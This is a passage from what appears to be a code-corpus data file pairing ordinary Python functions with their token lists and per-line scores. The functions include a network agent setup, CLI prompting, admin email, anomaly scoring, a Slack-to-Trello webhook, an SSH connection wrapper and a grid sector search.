"self",
")",
":",
"super",
"(",
"HyperVNeutronAgent",
",",
"self",
")",
".",
"_setup",
"(",
")",
"self",
".",
"_sg_plugin_rpc",
"=",
"sg_rpc",
".",
"SecurityGroupServerRpcApi",
"(",
"topics",
".",
"PLUGIN",
")",
"self",
".",
"_sec_groups_agent",
"=",
"HyperVSecurityAgent",
"(",
"self",
".",
"_context",
",",
"self",
".",
"_sg_plugin_rpc",
")",
"self",
".",
"_vlan_driver",
"=",
"trunk_driver",
".",
"HyperVTrunkDriver",
"(",
"self",
".",
"_context",
")",
"if",
"CONF",
".",
"NVGRE",
".",
"enable_support",
":",
"self",
".",
"_consumers",
".",
"append",
"(",
"[",
"h_constant",
".",
"TUNNEL",
",",
"topics",
".",
"UPDATE",
"]",
")",
"self",
".",
"_consumers",
".",
"append",
"(",
"[",
"h_constant",
".",
"LOOKUP",
",",
"h_constant",
".",
"UPDATE",
"]",
")"
] | 52.363636 | [
0.058823529411764705,
0.05,
0.041666666666666664,
0,
0.025974025974025976,
0.04477611940298507,
0.0547945205479452,
0.0273972602739726,
0.05405405405405406,
0.02857142857142857,
0.02702702702702703
] |
def prompt_choice(prompt, possibilities, default=None, only_in_poss=True,
show_default=True, prompt_suffix=': ', color=None):
"""
Prompt for a string in a given range of possibilities.
This also sets the history to the list of possibilities so
the user can scroll is with the arrow to find what he wants,
If only_in_poss is False, you are not guaranteed that this
will return one of the possibilities.
"""
assert len(possibilities) >= 1
assert not only_in_poss or default is None or default in possibilities, '$s not in possibilities' % default
contains_spaces = any(' ' in poss for poss in possibilities)
possibilities = sorted(possibilities)
readline.clear_history()
for kw in possibilities:
readline.add_history(kw)
def complete(text):
return [t for t in possibilities if t.startswith(text)]
while 1:
r = prompt_autocomplete(prompt, complete, default, contains_spaces=contains_spaces,
show_default=show_default, prompt_suffix=prompt_suffix, color=color)
if not only_in_poss or r in possibilities:
break
print('%s is not a possibility.' % r)
readline.clear_history()
return r | [
"def",
"prompt_choice",
"(",
"prompt",
",",
"possibilities",
",",
"default",
"=",
"None",
",",
"only_in_poss",
"=",
"True",
",",
"show_default",
"=",
"True",
",",
"prompt_suffix",
"=",
"': '",
",",
"color",
"=",
"None",
")",
":",
"assert",
"len",
"(",
"possibilities",
")",
">=",
"1",
"assert",
"not",
"only_in_poss",
"or",
"default",
"is",
"None",
"or",
"default",
"in",
"possibilities",
",",
"'$s not in possibilities'",
"%",
"default",
"contains_spaces",
"=",
"any",
"(",
"' '",
"in",
"poss",
"for",
"poss",
"in",
"possibilities",
")",
"possibilities",
"=",
"sorted",
"(",
"possibilities",
")",
"readline",
".",
"clear_history",
"(",
")",
"for",
"kw",
"in",
"possibilities",
":",
"readline",
".",
"add_history",
"(",
"kw",
")",
"def",
"complete",
"(",
"text",
")",
":",
"return",
"[",
"t",
"for",
"t",
"in",
"possibilities",
"if",
"t",
".",
"startswith",
"(",
"text",
")",
"]",
"while",
"1",
":",
"r",
"=",
"prompt_autocomplete",
"(",
"prompt",
",",
"complete",
",",
"default",
",",
"contains_spaces",
"=",
"contains_spaces",
",",
"show_default",
"=",
"show_default",
",",
"prompt_suffix",
"=",
"prompt_suffix",
",",
"color",
"=",
"color",
")",
"if",
"not",
"only_in_poss",
"or",
"r",
"in",
"possibilities",
":",
"break",
"print",
"(",
"'%s is not a possibility.'",
"%",
"r",
")",
"readline",
".",
"clear_history",
"(",
")",
"return",
"r"
] | 35.228571 | [
0.04054054054054054,
0.10144927536231885,
0.2857142857142857,
0.034482758620689655,
0,
0.03225806451612903,
0.03076923076923077,
0.03225806451612903,
0.04878048780487805,
0.2857142857142857,
0,
0.058823529411764705,
0.02702702702702703,
0,
0.03125,
0,
0.04878048780487805,
0,
0.07142857142857142,
0.07142857142857142,
0.0625,
0,
0.08695652173913043,
0.031746031746031744,
0,
0.16666666666666666,
0.05434782608695652,
0.07,
0.04,
0.11764705882352941,
0.044444444444444446,
0.25,
0.07142857142857142,
0,
0.16666666666666666
] |
def mail_admins(subject, message, fail_silently=False, connection=None,
html_message=None):
"""Sends a message to the admins, as defined by the DBBACKUP_ADMINS setting."""
if not settings.ADMINS:
return
mail = EmailMultiAlternatives('%s%s' % (settings.EMAIL_SUBJECT_PREFIX, subject),
message, settings.SERVER_EMAIL, [a[1] for a in settings.ADMINS],
connection=connection)
if html_message:
mail.attach_alternative(html_message, 'text/html')
mail.send(fail_silently=fail_silently) | [
"def",
"mail_admins",
"(",
"subject",
",",
"message",
",",
"fail_silently",
"=",
"False",
",",
"connection",
"=",
"None",
",",
"html_message",
"=",
"None",
")",
":",
"if",
"not",
"settings",
".",
"ADMINS",
":",
"return",
"mail",
"=",
"EmailMultiAlternatives",
"(",
"'%s%s'",
"%",
"(",
"settings",
".",
"EMAIL_SUBJECT_PREFIX",
",",
"subject",
")",
",",
"message",
",",
"settings",
".",
"SERVER_EMAIL",
",",
"[",
"a",
"[",
"1",
"]",
"for",
"a",
"in",
"settings",
".",
"ADMINS",
"]",
",",
"connection",
"=",
"connection",
")",
"if",
"html_message",
":",
"mail",
".",
"attach_alternative",
"(",
"html_message",
",",
"'text/html'",
")",
"mail",
".",
"send",
"(",
"fail_silently",
"=",
"fail_silently",
")"
] | 53.454545 | [
0.028169014084507043,
0.11428571428571428,
0.03614457831325301,
0.07407407407407407,
0.14285714285714285,
0.047619047619047616,
0.04081632653061224,
0.08928571428571429,
0.1,
0.034482758620689655,
0.047619047619047616
] |
def compute(self, activeColumns, predictedColumns,
inputValue=None, timestamp=None):
"""Compute the anomaly score as the percent of active columns not predicted.
:param activeColumns: array of active column indices
:param predictedColumns: array of columns indices predicted in this step
(used for anomaly in step T+1)
:param inputValue: (optional) value of current input to encoders
(eg "cat" for category encoder)
(used in anomaly-likelihood)
:param timestamp: (optional) date timestamp when the sample occured
(used in anomaly-likelihood)
:returns: the computed anomaly score; float 0..1
"""
# Start by computing the raw anomaly score.
anomalyScore = computeRawAnomalyScore(activeColumns, predictedColumns)
# Compute final anomaly based on selected mode.
if self._mode == Anomaly.MODE_PURE:
score = anomalyScore
elif self._mode == Anomaly.MODE_LIKELIHOOD:
if inputValue is None:
raise ValueError("Selected anomaly mode 'Anomaly.MODE_LIKELIHOOD' "
"requires 'inputValue' as parameter to compute() method. ")
probability = self._likelihood.anomalyProbability(
inputValue, anomalyScore, timestamp)
# low likelihood -> hi anomaly
score = 1 - probability
elif self._mode == Anomaly.MODE_WEIGHTED:
probability = self._likelihood.anomalyProbability(
inputValue, anomalyScore, timestamp)
score = anomalyScore * (1 - probability)
# Last, do moving-average if windowSize was specified.
if self._movingAverage is not None:
score = self._movingAverage.next(score)
# apply binary discretization if required
if self._binaryThreshold is not None:
if score >= self._binaryThreshold:
score = 1.0
else:
score = 0.0
return score | [
"def",
"compute",
"(",
"self",
",",
"activeColumns",
",",
"predictedColumns",
",",
"inputValue",
"=",
"None",
",",
"timestamp",
"=",
"None",
")",
":",
"# Start by computing the raw anomaly score.",
"anomalyScore",
"=",
"computeRawAnomalyScore",
"(",
"activeColumns",
",",
"predictedColumns",
")",
"# Compute final anomaly based on selected mode.",
"if",
"self",
".",
"_mode",
"==",
"Anomaly",
".",
"MODE_PURE",
":",
"score",
"=",
"anomalyScore",
"elif",
"self",
".",
"_mode",
"==",
"Anomaly",
".",
"MODE_LIKELIHOOD",
":",
"if",
"inputValue",
"is",
"None",
":",
"raise",
"ValueError",
"(",
"\"Selected anomaly mode 'Anomaly.MODE_LIKELIHOOD' \"",
"\"requires 'inputValue' as parameter to compute() method. \"",
")",
"probability",
"=",
"self",
".",
"_likelihood",
".",
"anomalyProbability",
"(",
"inputValue",
",",
"anomalyScore",
",",
"timestamp",
")",
"# low likelihood -> hi anomaly",
"score",
"=",
"1",
"-",
"probability",
"elif",
"self",
".",
"_mode",
"==",
"Anomaly",
".",
"MODE_WEIGHTED",
":",
"probability",
"=",
"self",
".",
"_likelihood",
".",
"anomalyProbability",
"(",
"inputValue",
",",
"anomalyScore",
",",
"timestamp",
")",
"score",
"=",
"anomalyScore",
"*",
"(",
"1",
"-",
"probability",
")",
"# Last, do moving-average if windowSize was specified.",
"if",
"self",
".",
"_movingAverage",
"is",
"not",
"None",
":",
"score",
"=",
"self",
".",
"_movingAverage",
".",
"next",
"(",
"score",
")",
"# apply binary discretization if required",
"if",
"self",
".",
"_binaryThreshold",
"is",
"not",
"None",
":",
"if",
"score",
">=",
"self",
".",
"_binaryThreshold",
":",
"score",
"=",
"1.0",
"else",
":",
"score",
"=",
"0.0",
"return",
"score"
] | 41.521739 | [
0.04,
0.1276595744680851,
0.0375,
0,
0.05357142857142857,
0.039473684210526314,
0.05084745762711865,
0.04411764705882353,
0.046153846153846156,
0.04838709677419355,
0.04225352112676056,
0.04918032786885246,
0.07692307692307693,
0.2857142857142857,
0.0425531914893617,
0.02702702702702703,
0,
0.0392156862745098,
0.05128205128205128,
0.11538461538461539,
0.0425531914893617,
0.10714285714285714,
0.04,
0.05263157894736842,
0,
0.07142857142857142,
0.08695652173913043,
0.08333333333333333,
0.10344827586206896,
0.044444444444444446,
0.07142857142857142,
0.08695652173913043,
0.06521739130434782,
0,
0.034482758620689655,
0.05128205128205128,
0.06666666666666667,
0,
0.044444444444444446,
0.04878048780487805,
0.075,
0.10526315789473684,
0.2727272727272727,
0.10526315789473684,
0,
0.125
] |
def _get_interface_name_from_hosting_port(self, port):
"""
Extract the underlying subinterface name for a port
e.g. Port-channel10.200 or GigabitEthernet0/0/0.500
"""
try:
vlan = port['hosting_info']['segmentation_id']
int_prefix = port['hosting_info']['physical_interface']
return '%s.%s' % (int_prefix, vlan)
except KeyError as e:
params = {'key': e}
raise cfg_exc.DriverExpectedKeyNotSetException(**params) | [
"def",
"_get_interface_name_from_hosting_port",
"(",
"self",
",",
"port",
")",
":",
"try",
":",
"vlan",
"=",
"port",
"[",
"'hosting_info'",
"]",
"[",
"'segmentation_id'",
"]",
"int_prefix",
"=",
"port",
"[",
"'hosting_info'",
"]",
"[",
"'physical_interface'",
"]",
"return",
"'%s.%s'",
"%",
"(",
"int_prefix",
",",
"vlan",
")",
"except",
"KeyError",
"as",
"e",
":",
"params",
"=",
"{",
"'key'",
":",
"e",
"}",
"raise",
"cfg_exc",
".",
"DriverExpectedKeyNotSetException",
"(",
"*",
"*",
"params",
")"
] | 42.166667 | [
0.018518518518518517,
0.18181818181818182,
0.03389830508474576,
0.03389830508474576,
0.18181818181818182,
0.16666666666666666,
0.034482758620689655,
0.029850746268656716,
0.0425531914893617,
0.06896551724137931,
0.06451612903225806,
0.029411764705882353
] |
def slack_message():
"""When we receive a message from Slack, generate a Trello card and reply"""
# Incoming request format:
# token=TOKEN
# team_id=T0001
# team_domain=example
# channel_id=C12345
# channel_name=test
# user_id=U12345
# user_name=Steve
# command=/weather
# text=94070
# Verify Slack token lines up
if request.form['token'] != SLACK_TOKEN:
return ('Provided Slack token from message didn\'t match our server\'s Slack token. '
'Please double check they are aligned', 403)
# Extract our text and make a card
text = request.form['text']
user_name = request.form['user_name']
# Pre-emptively extract channel name before taking actions (transaction-esque)
channel_name = request.form['channel_name']
card = make_trello_card(name='{text} ({user_name})'.format(text=text, user_name=user_name))
# Send a message to Slack about our success
# TODO: Escape our content
send_slack_message(channel='#{channel_name}'.format(channel_name=channel_name),
text='Trello card "<{url}|{text}>" created by "{user_name}"'
.format(url=card.url, text=text, user_name=user_name))
# Reply with nothing (as the external message does more)
return '' | [
"def",
"slack_message",
"(",
")",
":",
"# Incoming request format:",
"# token=TOKEN",
"# team_id=T0001",
"# team_domain=example",
"# channel_id=C12345",
"# channel_name=test",
"# user_id=U12345",
"# user_name=Steve",
"# command=/weather",
"# text=94070",
"# Verify Slack token lines up",
"if",
"request",
".",
"form",
"[",
"'token'",
"]",
"!=",
"SLACK_TOKEN",
":",
"return",
"(",
"'Provided Slack token from message didn\\'t match our server\\'s Slack token. '",
"'Please double check they are aligned'",
",",
"403",
")",
"# Extract our text and make a card",
"text",
"=",
"request",
".",
"form",
"[",
"'text'",
"]",
"user_name",
"=",
"request",
".",
"form",
"[",
"'user_name'",
"]",
"# Pre-emptively extract channel name before taking actions (transaction-esque)",
"channel_name",
"=",
"request",
".",
"form",
"[",
"'channel_name'",
"]",
"card",
"=",
"make_trello_card",
"(",
"name",
"=",
"'{text} ({user_name})'",
".",
"format",
"(",
"text",
"=",
"text",
",",
"user_name",
"=",
"user_name",
")",
")",
"# Send a message to Slack about our success",
"# TODO: Escape our content",
"send_slack_message",
"(",
"channel",
"=",
"'#{channel_name}'",
".",
"format",
"(",
"channel_name",
"=",
"channel_name",
")",
",",
"text",
"=",
"'Trello card \"<{url}|{text}>\" created by \"{user_name}\"'",
".",
"format",
"(",
"url",
"=",
"card",
".",
"url",
",",
"text",
"=",
"text",
",",
"user_name",
"=",
"user_name",
")",
")",
"# Reply with nothing (as the external message does more)",
"return",
"''"
] | 38.575758 | [
0.05,
0.0375,
0.06666666666666667,
0.11764705882352941,
0.10526315789473684,
0.08,
0.08695652173913043,
0.08695652173913043,
0.1,
0.09523809523809523,
0.09090909090909091,
0.125,
0,
0.06060606060606061,
0.045454545454545456,
0.043010752688172046,
0.05,
0,
0.05263157894736842,
0.06451612903225806,
0.04878048780487805,
0.036585365853658534,
0.0425531914893617,
0.031578947368421054,
0,
0.0425531914893617,
0.06666666666666667,
0.04819277108433735,
0.060240963855421686,
0.05194805194805195,
0,
0.03333333333333333,
0.15384615384615385
] |
def poll(self):
"""
Get, and remove, the first (lowest) item from this queue.
:return: the first (lowest) item from this queue.
:rtype: Point, Event pair.
"""
assert(len(self.events_scan) != 0)
p, events_current = self.events_scan.pop_min()
return p, events_current | [
"def",
"poll",
"(",
"self",
")",
":",
"assert",
"(",
"len",
"(",
"self",
".",
"events_scan",
")",
"!=",
"0",
")",
"p",
",",
"events_current",
"=",
"self",
".",
"events_scan",
".",
"pop_min",
"(",
")",
"return",
"p",
",",
"events_current"
] | 32.1 | [
0.06666666666666667,
0.18181818181818182,
0.046153846153846156,
0,
0.07017543859649122,
0.08823529411764706,
0.18181818181818182,
0.047619047619047616,
0.037037037037037035,
0.0625
] |
def connect_ssh(*args, **kwargs):
"""
Create a new connected :class:`SSHClient` instance. All arguments
are passed to :meth:`SSHClient.connect`.
"""
client = SSHClient()
client.connect(*args, **kwargs)
return client | [
"def",
"connect_ssh",
"(",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
":",
"client",
"=",
"SSHClient",
"(",
")",
"client",
".",
"connect",
"(",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
"return",
"client"
] | 29.333333 | [
0.030303030303030304,
0.18181818181818182,
0.0821917808219178,
0.125,
0.18181818181818182,
0,
0.07142857142857142,
0.05128205128205128,
0.09523809523809523
] |
def file_map(path, instructions, **kw):
'''
file_map(path, instructions) yields a file-map object for the given path and instruction-set.
file_map(None, instructions) yields a lambda of exactly one argument that is equivalent to the
following: lambda p: file_map(p, instructions)
File-map objects are pimms immutable objects that combine a format-spec for a directory
(instructions) with a directory to yield a lazily-loaded data object. The format-spec is not
currently documented, but interested users should see the variable
neuropythy.hcp.files.hcp_filemap_instructions.
The following options can be given:
* path_parameters (default: None) may be set to a map of parameters that are used to format the
filenames in the instructions.
* data_hierarchy (default: None) may specify how the data should be nested; see the variable
neuropythy.hcp.files.hcp_filemap_data_hierarchy.
* load_function (default: None) may specify the function that is used to load filenames; if
None then neuropythy.io.load is used.
* meta_data (default: None) may be passed on to the FileMap object.
Any additional keyword arguments given to the file_map function will be used as supplemental
paths.
'''
if path: return FileMap(path, instructions, **kw)
else: return lambda path:file_map(path, instructions, **kw) | [
"def",
"file_map",
"(",
"path",
",",
"instructions",
",",
"*",
"*",
"kw",
")",
":",
"if",
"path",
":",
"return",
"FileMap",
"(",
"path",
",",
"instructions",
",",
"*",
"*",
"kw",
")",
"else",
":",
"return",
"lambda",
"path",
":",
"file_map",
"(",
"path",
",",
"instructions",
",",
"*",
"*",
"kw",
")"
] | 55.28 | [
0.02564102564102564,
0.2857142857142857,
0.030927835051546393,
0.030612244897959183,
0.07547169811320754,
0.5,
0.043478260869565216,
0.03125,
0.02857142857142857,
0.04,
0.5,
0.05128205128205128,
0.05,
0.08108108108108109,
0.061855670103092786,
0.05454545454545454,
0.0625,
0.06818181818181818,
0.05555555555555555,
0,
0.03125,
0.2,
0.2857142857142857,
0.05660377358490566,
0.07575757575757576
] |
def no_company_with_insufficient_companies_house_data(value):
"""
Confirms that the company number is not for for a company that
Companies House does not hold information on.
Args:
value (string): The company number to check.
Raises:
django.forms.ValidationError
"""
for prefix, name in company_types_with_insufficient_companies_house_data:
if value.upper().startswith(prefix):
raise ValidationError(
MESSAGE_INSUFFICIENT_DATA, params={'name': name}
) | [
"def",
"no_company_with_insufficient_companies_house_data",
"(",
"value",
")",
":",
"for",
"prefix",
",",
"name",
"in",
"company_types_with_insufficient_companies_house_data",
":",
"if",
"value",
".",
"upper",
"(",
")",
".",
"startswith",
"(",
"prefix",
")",
":",
"raise",
"ValidationError",
"(",
"MESSAGE_INSUFFICIENT_DATA",
",",
"params",
"=",
"{",
"'name'",
":",
"name",
"}",
")"
] | 29.444444 | [
0.01639344262295082,
0.2857142857142857,
0.030303030303030304,
0.04081632653061224,
0,
0.2222222222222222,
0.057692307692307696,
0,
0.18181818181818182,
0.05555555555555555,
0,
0.2857142857142857,
0,
0.025974025974025976,
0.045454545454545456,
0.08823529411764706,
0.046875,
0.23076923076923078
] |
def redefineBuffer(self, newBuffer ):
"""!
\~english
Redefine frame of Screen
@param newFrame: a new fram data
@note
newFrame can be:
* PIL Image
* PIL ImageFile
* Dictionary, eg. { "size":(width, height), "color_mode":"1" } or { "size":(width, height), "color_mode":"RGB" }
\~chinese
重新定义缓存数据
@param newFrame: 新缓存数据 \n
newFrame 可以为下面值:
* PIL Image
* PIL ImageFile
* 字典, eg. { "size":(width, height), "color_mode":"1" } or { "size":(width, height), "color_mode":"RGB" }
"""
# Redefine Frame from an image object
if type(self._buffer) == type(newBuffer):
self._buffer = newBuffer
self.Canvas = ImageDraw.Draw( self._buffer )
# self.View.resize(newBuffer.width, newBuffer.height)
return True
# Redefine Frame from an <PIL.ImageFile.ImageFile>
if type(newBuffer).__name__.find(PIL.ImageFile.ImageFile.__name__) != -1:
self._buffer = self._buffer.resize((newBuffer.width, newBuffer.height))
self._buffer.paste( newBuffer, (0,0))
# self.View.resize(newBuffer.width, newBuffer.height)
return True
# Recreated a new frame from dict of frame
if isinstance(newBuffer, dict):
self._buffer = Image.new( newBuffer["color_mode"] , newBuffer["size"] )
self.Canvas = ImageDraw.Draw( self._buffer )
return True
pass | [
"def",
"redefineBuffer",
"(",
"self",
",",
"newBuffer",
")",
":",
"# Redefine Frame from an image object",
"if",
"type",
"(",
"self",
".",
"_buffer",
")",
"==",
"type",
"(",
"newBuffer",
")",
":",
"self",
".",
"_buffer",
"=",
"newBuffer",
"self",
".",
"Canvas",
"=",
"ImageDraw",
".",
"Draw",
"(",
"self",
".",
"_buffer",
")",
"# self.View.resize(newBuffer.width, newBuffer.height)",
"return",
"True",
"# Redefine Frame from an <PIL.ImageFile.ImageFile>",
"if",
"type",
"(",
"newBuffer",
")",
".",
"__name__",
".",
"find",
"(",
"PIL",
".",
"ImageFile",
".",
"ImageFile",
".",
"__name__",
")",
"!=",
"-",
"1",
":",
"self",
".",
"_buffer",
"=",
"self",
".",
"_buffer",
".",
"resize",
"(",
"(",
"newBuffer",
".",
"width",
",",
"newBuffer",
".",
"height",
")",
")",
"self",
".",
"_buffer",
".",
"paste",
"(",
"newBuffer",
",",
"(",
"0",
",",
"0",
")",
")",
"# self.View.resize(newBuffer.width, newBuffer.height)",
"return",
"True",
"# Recreated a new frame from dict of frame",
"if",
"isinstance",
"(",
"newBuffer",
",",
"dict",
")",
":",
"self",
".",
"_buffer",
"=",
"Image",
".",
"new",
"(",
"newBuffer",
"[",
"\"color_mode\"",
"]",
",",
"newBuffer",
"[",
"\"size\"",
"]",
")",
"self",
".",
"Canvas",
"=",
"ImageDraw",
".",
"Draw",
"(",
"self",
".",
"_buffer",
")",
"return",
"True",
"pass"
] | 39.230769 | [
0.05405405405405406,
0.16666666666666666,
0.16666666666666666,
0.0625,
0.05,
0.15384615384615385,
0.07142857142857142,
0.08695652173913043,
0.07407407407407407,
0.08870967741935484,
0,
0.11764705882352941,
0.125,
0.06060606060606061,
0.07142857142857142,
0.08695652173913043,
0.07407407407407407,
0.10256410256410256,
0.18181818181818182,
0.044444444444444446,
0.04081632653061224,
0.05555555555555555,
0.07142857142857142,
0.015384615384615385,
0.08695652173913043,
0,
0.034482758620689655,
0.0449438202247191,
0.03614457831325301,
0.08163265306122448,
0.015384615384615385,
0.08695652173913043,
0,
0.04,
0.05128205128205128,
0.07228915662650602,
0.07142857142857142,
0.08695652173913043,
0.16666666666666666
] |
def findSector(self,x,y):
'''
Finds the quadrilateral "sector" for each (x,y) point in the input.
Only called as a subroutine of _evaluate().
Parameters
----------
x : np.array
Values whose sector should be found.
y : np.array
Values whose sector should be found. Should be same size as x.
Returns
-------
x_pos : np.array
Sector x-coordinates for each point of the input, of the same size.
y_pos : np.array
Sector y-coordinates for each point of the input, of the same size.
'''
# Initialize the sector guess
m = x.size
x_pos_guess = (np.ones(m)*self.x_n/2).astype(int)
y_pos_guess = (np.ones(m)*self.y_n/2).astype(int)
# Define a function that checks whether a set of points violates a linear
# boundary defined by (x_bound_1,y_bound_1) and (x_bound_2,y_bound_2),
# where the latter is *COUNTER CLOCKWISE* from the former. Returns
# 1 if the point is outside the boundary and 0 otherwise.
violationCheck = lambda x_check,y_check,x_bound_1,y_bound_1,x_bound_2,y_bound_2 : (
(y_bound_2 - y_bound_1)*x_check - (x_bound_2 - x_bound_1)*y_check > x_bound_1*y_bound_2 - y_bound_1*x_bound_2 ) + 0
# Identify the correct sector for each point to be evaluated
these = np.ones(m,dtype=bool)
max_loops = self.x_n + self.y_n
loops = 0
while np.any(these) and loops < max_loops:
# Get coordinates for the four vertices: (xA,yA),...,(xD,yD)
x_temp = x[these]
y_temp = y[these]
xA = self.x_values[x_pos_guess[these],y_pos_guess[these]]
xB = self.x_values[x_pos_guess[these]+1,y_pos_guess[these]]
xC = self.x_values[x_pos_guess[these],y_pos_guess[these]+1]
xD = self.x_values[x_pos_guess[these]+1,y_pos_guess[these]+1]
yA = self.y_values[x_pos_guess[these],y_pos_guess[these]]
yB = self.y_values[x_pos_guess[these]+1,y_pos_guess[these]]
yC = self.y_values[x_pos_guess[these],y_pos_guess[these]+1]
yD = self.y_values[x_pos_guess[these]+1,y_pos_guess[these]+1]
# Check the "bounding box" for the sector: is this guess plausible?
move_down = (y_temp < np.minimum(yA,yB)) + 0
move_right = (x_temp > np.maximum(xB,xD)) + 0
move_up = (y_temp > np.maximum(yC,yD)) + 0
move_left = (x_temp < np.minimum(xA,xC)) + 0
# Check which boundaries are violated (and thus where to look next)
c = (move_down + move_right + move_up + move_left) == 0
move_down[c] = violationCheck(x_temp[c],y_temp[c],xA[c],yA[c],xB[c],yB[c])
move_right[c] = violationCheck(x_temp[c],y_temp[c],xB[c],yB[c],xD[c],yD[c])
move_up[c] = violationCheck(x_temp[c],y_temp[c],xD[c],yD[c],xC[c],yC[c])
move_left[c] = violationCheck(x_temp[c],y_temp[c],xC[c],yC[c],xA[c],yA[c])
# Update the sector guess based on the violations
x_pos_next = x_pos_guess[these] - move_left + move_right
x_pos_next[x_pos_next < 0] = 0
x_pos_next[x_pos_next > (self.x_n-2)] = self.x_n-2
y_pos_next = y_pos_guess[these] - move_down + move_up
y_pos_next[y_pos_next < 0] = 0
y_pos_next[y_pos_next > (self.y_n-2)] = self.y_n-2
# Check which sectors have not changed, and mark them as complete
no_move = np.array(np.logical_and(x_pos_guess[these] == x_pos_next, y_pos_guess[these] == y_pos_next))
x_pos_guess[these] = x_pos_next
y_pos_guess[these] = y_pos_next
temp = these.nonzero()
these[temp[0][no_move]] = False
# Move to the next iteration of the search
loops += 1
# Return the output
x_pos = x_pos_guess
y_pos = y_pos_guess
return x_pos, y_pos | [
"def",
"findSector",
"(",
"self",
",",
"x",
",",
"y",
")",
":",
"# Initialize the sector guess",
"m",
"=",
"x",
".",
"size",
"x_pos_guess",
"=",
"(",
"np",
".",
"ones",
"(",
"m",
")",
"*",
"self",
".",
"x_n",
"/",
"2",
")",
".",
"astype",
"(",
"int",
")",
"y_pos_guess",
"=",
"(",
"np",
".",
"ones",
"(",
"m",
")",
"*",
"self",
".",
"y_n",
"/",
"2",
")",
".",
"astype",
"(",
"int",
")",
"# Define a function that checks whether a set of points violates a linear",
"# boundary defined by (x_bound_1,y_bound_1) and (x_bound_2,y_bound_2),",
"# where the latter is *COUNTER CLOCKWISE* from the former. Returns",
"# 1 if the point is outside the boundary and 0 otherwise.",
"violationCheck",
"=",
"lambda",
"x_check",
",",
"y_check",
",",
"x_bound_1",
",",
"y_bound_1",
",",
"x_bound_2",
",",
"y_bound_2",
":",
"(",
"(",
"y_bound_2",
"-",
"y_bound_1",
")",
"*",
"x_check",
"-",
"(",
"x_bound_2",
"-",
"x_bound_1",
")",
"*",
"y_check",
">",
"x_bound_1",
"*",
"y_bound_2",
"-",
"y_bound_1",
"*",
"x_bound_2",
")",
"+",
"0",
"# Identify the correct sector for each point to be evaluated",
"these",
"=",
"np",
".",
"ones",
"(",
"m",
",",
"dtype",
"=",
"bool",
")",
"max_loops",
"=",
"self",
".",
"x_n",
"+",
"self",
".",
"y_n",
"loops",
"=",
"0",
"while",
"np",
".",
"any",
"(",
"these",
")",
"and",
"loops",
"<",
"max_loops",
":",
"# Get coordinates for the four vertices: (xA,yA),...,(xD,yD)",
"x_temp",
"=",
"x",
"[",
"these",
"]",
"y_temp",
"=",
"y",
"[",
"these",
"]",
"xA",
"=",
"self",
".",
"x_values",
"[",
"x_pos_guess",
"[",
"these",
"]",
",",
"y_pos_guess",
"[",
"these",
"]",
"]",
"xB",
"=",
"self",
".",
"x_values",
"[",
"x_pos_guess",
"[",
"these",
"]",
"+",
"1",
",",
"y_pos_guess",
"[",
"these",
"]",
"]",
"xC",
"=",
"self",
".",
"x_values",
"[",
"x_pos_guess",
"[",
"these",
"]",
",",
"y_pos_guess",
"[",
"these",
"]",
"+",
"1",
"]",
"xD",
"=",
"self",
".",
"x_values",
"[",
"x_pos_guess",
"[",
"these",
"]",
"+",
"1",
",",
"y_pos_guess",
"[",
"these",
"]",
"+",
"1",
"]",
"yA",
"=",
"self",
".",
"y_values",
"[",
"x_pos_guess",
"[",
"these",
"]",
",",
"y_pos_guess",
"[",
"these",
"]",
"]",
"yB",
"=",
"self",
".",
"y_values",
"[",
"x_pos_guess",
"[",
"these",
"]",
"+",
"1",
",",
"y_pos_guess",
"[",
"these",
"]",
"]",
"yC",
"=",
"self",
".",
"y_values",
"[",
"x_pos_guess",
"[",
"these",
"]",
",",
"y_pos_guess",
"[",
"these",
"]",
"+",
"1",
"]",
"yD",
"=",
"self",
".",
"y_values",
"[",
"x_pos_guess",
"[",
"these",
"]",
"+",
"1",
",",
"y_pos_guess",
"[",
"these",
"]",
"+",
"1",
"]",
"# Check the \"bounding box\" for the sector: is this guess plausible?",
"move_down",
"=",
"(",
"y_temp",
"<",
"np",
".",
"minimum",
"(",
"yA",
",",
"yB",
")",
")",
"+",
"0",
"move_right",
"=",
"(",
"x_temp",
">",
"np",
".",
"maximum",
"(",
"xB",
",",
"xD",
")",
")",
"+",
"0",
"move_up",
"=",
"(",
"y_temp",
">",
"np",
".",
"maximum",
"(",
"yC",
",",
"yD",
")",
")",
"+",
"0",
"move_left",
"=",
"(",
"x_temp",
"<",
"np",
".",
"minimum",
"(",
"xA",
",",
"xC",
")",
")",
"+",
"0",
"# Check which boundaries are violated (and thus where to look next)",
"c",
"=",
"(",
"move_down",
"+",
"move_right",
"+",
"move_up",
"+",
"move_left",
")",
"==",
"0",
"move_down",
"[",
"c",
"]",
"=",
"violationCheck",
"(",
"x_temp",
"[",
"c",
"]",
",",
"y_temp",
"[",
"c",
"]",
",",
"xA",
"[",
"c",
"]",
",",
"yA",
"[",
"c",
"]",
",",
"xB",
"[",
"c",
"]",
",",
"yB",
"[",
"c",
"]",
")",
"move_right",
"[",
"c",
"]",
"=",
"violationCheck",
"(",
"x_temp",
"[",
"c",
"]",
",",
"y_temp",
"[",
"c",
"]",
",",
"xB",
"[",
"c",
"]",
",",
"yB",
"[",
"c",
"]",
",",
"xD",
"[",
"c",
"]",
",",
"yD",
"[",
"c",
"]",
")",
"move_up",
"[",
"c",
"]",
"=",
"violationCheck",
"(",
"x_temp",
"[",
"c",
"]",
",",
"y_temp",
"[",
"c",
"]",
",",
"xD",
"[",
"c",
"]",
",",
"yD",
"[",
"c",
"]",
",",
"xC",
"[",
"c",
"]",
",",
"yC",
"[",
"c",
"]",
")",
"move_left",
"[",
"c",
"]",
"=",
"violationCheck",
"(",
"x_temp",
"[",
"c",
"]",
",",
"y_temp",
"[",
"c",
"]",
",",
"xC",
"[",
"c",
"]",
",",
"yC",
"[",
"c",
"]",
",",
"xA",
"[",
"c",
"]",
",",
"yA",
"[",
"c",
"]",
")",
"# Update the sector guess based on the violations",
"x_pos_next",
"=",
"x_pos_guess",
"[",
"these",
"]",
"-",
"move_left",
"+",
"move_right",
"x_pos_next",
"[",
"x_pos_next",
"<",
"0",
"]",
"=",
"0",
"x_pos_next",
"[",
"x_pos_next",
">",
"(",
"self",
".",
"x_n",
"-",
"2",
")",
"]",
"=",
"self",
".",
"x_n",
"-",
"2",
"y_pos_next",
"=",
"y_pos_guess",
"[",
"these",
"]",
"-",
"move_down",
"+",
"move_up",
"y_pos_next",
"[",
"y_pos_next",
"<",
"0",
"]",
"=",
"0",
